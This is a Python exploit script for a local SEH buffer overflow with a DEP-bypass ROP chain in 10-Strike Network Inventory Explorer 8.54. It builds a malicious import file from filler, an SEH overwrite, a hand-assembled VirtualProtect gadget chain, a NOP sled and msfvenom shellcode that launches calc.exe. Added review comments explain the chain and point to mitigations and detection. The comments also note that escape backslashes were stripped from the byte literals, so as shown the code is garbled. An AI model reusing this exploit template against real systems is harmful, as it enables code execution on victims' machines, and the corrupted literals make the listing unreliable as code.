#!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-29-19
# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
# Vendor Homepage: https://www.10-strike.com/
# Version: 8.54
# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app, select Computers tab
# 3. click on 'From Text File'
# 4. choose 10strike.txt that was generated
# 5. pop calc

# ROP chain assembled by hand from the gadgets mona.py lists in 'rop.txt' and 'ropfunc.txt';
# the goal was to practice a DEP bypass without relying on mona.py's auto-generated chains

# original seh poc from Hashim Jawad, EDB: 44838
# the original author's notes state that the offset depends on the username length; the username used for this PoC is 'user'

# badchars: \x00\x0a\x0d\x2f

import struct

# Path of the crafted input file; the PoC steps in the header load it through
# the application's 'From Text File' import.
filename = "10strike.txt"

# NOTE(review): throughout this listing the string literals read "x41", "x42",
# "x90", "x45" — the escape backslashes appear to have been lost in extraction,
# so as shown each is three ASCII characters rather than the single byte the
# author's comments describe (len(junk) would be 627, not 209). The comments
# below follow the author's intended byte values.

# Filler up to the SEH record. Per the header note, the 209-byte offset was
# measured with the username 'user' and shifts with the username length.
junk = "x41" * 209

# Value written over the SEH handler pointer, packed little-endian 32-bit.
# The page does not say which instruction sits at 0x10013e29; by address range
# it presumably lives in the same module as the 0x1001xxxx gadgets in the ROP
# chain. A handler address inside a module built with SafeSEH is rejected by
# the dispatcher before it runs, so that module's build flags are the
# mitigation to check on the vendor side.
seh = struct.pack('<L',0x10013e29)

# 12 bytes of alignment filler between the handler address and the chain.
fill = "x42"*12

# ROP chain that loads the registers for a VirtualProtect() call and then
# PUSHADs them onto the stack (the register roles are the author's section
# headers below). Every gadget address is hard-coded for the tested
# environment (Windows 7 SP1 x86, per the header) and falls into one of three
# ranges — 0x1001xxxx, 0x7c3xxxxx, 0x61exxxxx — which suggests gadgets from
# three loaded modules; only the last is named on this page (sqlite3, on the
# lpOldProtect line). The chain therefore works only while those modules load
# at fixed bases: shipping them with ASLR support (/DYNAMICBASE) breaks it
# without touching the overflow itself. The bad char 0x00 (header) is avoided
# by loading 0xffffffff and correcting with INC, and by loading negated
# constants and NEGing them in place.

#VirtualProtect()
#ESI = ptr to VirtualProtect()
# EAX <- [0x61e9b30c]; EBX <- 0xffffffff + EAX + 1 == EAX (mod 2^32);
# ESI <- 0xffffffff + EBX + 1 == EBX. Net effect: ESI holds the resolved
# VirtualProtect address with no NUL byte in the chain.
rop = struct.pack('<L',0x7c3762b3) # POP EAX # RETN
rop += struct.pack('<L',0x61e9b30c) # ptr to &VirtualProtect()
rop += struct.pack('<L',0x1001872e) # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c358a01) # INC EBX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c3501d5) # POP ESI # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e8509c) # ADD ESI,EBX # RETN
rop += struct.pack('<L',0x7c370464) # INC ESI # RETN

#EBP = ReturnTo (ptr to jmp esp)
#mona.py jmp -r esp -cpb '\x00\x0a\x0d'
# Per the author's ReturnTo label, this is the address VirtualProtect returns
# into; a 'push esp # ret' gadget lands execution on the stack just past the
# chain, i.e. in the NOP sled that follows.
rop += struct.pack('<L',0x61e05892) # POP EBP # RETN
rop += struct.pack('<L',0x61e053a9) # push esp # ret

#EBX = dwSize x201
# NEG 0xfffffdff == 0x201; EBX is then (0xffffffff + 1) + 0x201 == 0x201.
rop += struct.pack('<L',0x7c348495) # POP EAX # RETN
rop += struct.pack('<L',0xfffffdff) #
rop += struct.pack('<L',0x7c351e05) # NEG EAX # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e0579d) # INC EBX # RETN
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN

#EDX = NewProtect (0x40)
# NEG 0xffffffc0 == 0x40, i.e. PAGE_EXECUTE_READWRITE.
rop += struct.pack('<L',0x7c344160) # POP EDX # RETN
rop += struct.pack('<L',0xffffffc0) #
rop += struct.pack('<L',0x7c351eb1) # NEG EDX # RETN

#ECX = lpOldProtect (ptr to W address)
# VirtualProtect writes the previous protection here; any writable address
# in a non-relocating module serves.
rop += struct.pack('<L',0x7c37157a) # POP ECX # RETN
rop += struct.pack('<L',0x61e894c0) # &Writable location sqlite3

#EDI = ROP NOP (RETN)
rop += struct.pack('<L',0x1001ab53) # POP EDI # RETN
rop += struct.pack('<L',0x1001ab54) # ROP-NOP

#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x7c3647cc) # POP EAX # RETN
rop += struct.pack('<L',0x90909090) # nop

#PUSHAD
# PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, leaving EDI on top.
# The RETN pops EDI (the ROP-NOP), which returns into ESI (VirtualProtect);
# at that point EBP is its return address and the saved ESP, EBX, EDX, ECX
# are its lpAddress, dwSize, flNewProtect, lpOldProtect arguments — matching
# the author's register labels above.
rop += struct.pack('<L',0x10019094) # PUSHAD # RETN

# 10-byte NOP sled between the chain and the payload. (As with the other
# literals in this listing, the escape backslash appears stripped — shown as
# three ASCII characters, not one 0x90 byte.)
nops = "x90"*10

#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d\x3a\x5c' -f python
#Payload size: 220 bytes
# Encoded payload emitted by the msfvenom command quoted above; per that
# command it only launches calc.exe, the usual benign demonstrator. For
# detection the useful observable is presumably the inventory application
# spawning a child process right after importing a text file — the shellcode
# bytes themselves are encoder output and not a stable indicator.
calc = ""
calc += "xbbx29x86xf9x07xdaxdbxd9x74x24xf4x5ex31"
calc += "xc9xb1x31x31x5ex13x83xeexfcx03x5ex26x64"
calc += "x0cxfbxd0xeaxefx04x20x8bx66xe1x11x8bx1d"
calc += "x61x01x3bx55x27xadxb0x3bxdcx26xb4x93xd3"
calc += "x8fx73xc2xdax10x2fx36x7cx92x32x6bx5exab"
calc += "xfcx7ex9fxecxe1x73xcdxa5x6ex21xe2xc2x3b"
calc += "xfax89x98xaax7ax6dx68xccxabx20xe3x97x6b"
calc += "xc2x20xacx25xdcx25x89xfcx57x9dx65xffxb1"
calc += "xecx86xacxffxc1x74xacx38xe5x66xdbx30x16"
calc += "x1axdcx86x65xc0x69x1dxcdx83xcaxf9xecx40"
calc += "x8cx8axe2x2dxdaxd5xe6xb0x0fx6ex12x38xae"
calc += "xa1x93x7ax95x65xf8xd9xb4x3cxa4x8cxc9x5f"
calc += "x07x70x6cx2bxa5x65x1dx76xa3x78x93x0cx81"
calc += "x7bxabx0exb5x13x9ax85x5ax63x23x4cx1fx9b"
calc += "x69xcdx09x34x34x87x08x59xc7x7dx4ex64x44"
calc += "x74x2ex93x54xfdx2bxdfxd2xedx41x70xb7x11"
calc += "xf6x71x92x71x99xe1x7ex58x3cx82xe5xa4"

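# Fill the remainder of the 3000-byte buffer. If the preceding parts already
# exceed 3000 the multiplier goes negative and pad is "" — no error, the file
# is simply longer than 3000 bytes. As this listing is shown the "x45"
# literal is three ASCII characters (escape backslash apparently stripped in
# extraction), so the arithmetic matches the author's intent only with the
# escape restored.
pad = "x45"*(3000 - len(junk + seh + fill + rop + nops + calc))

# Final layout: filler, SEH handler address, alignment, ROP chain, NOP sled,
# payload, padding. It is written as a single line with no newline, which is
# consistent with 0x0a/0x0d being listed as bad chars in the header.
buffer = junk + seh + fill + rop + nops + calc + pad

# Write the crafted input file. The context manager closes the handle even if
# the write raises (the original open/write/close left it open on error).
# NOTE(review): struct.pack returns bytes on Python 3, so the str + bytes
# concatenation above only works under Python 2, which the shebang implies.
with open(filename, 'w') as textfile:
    textfile.write(buffer)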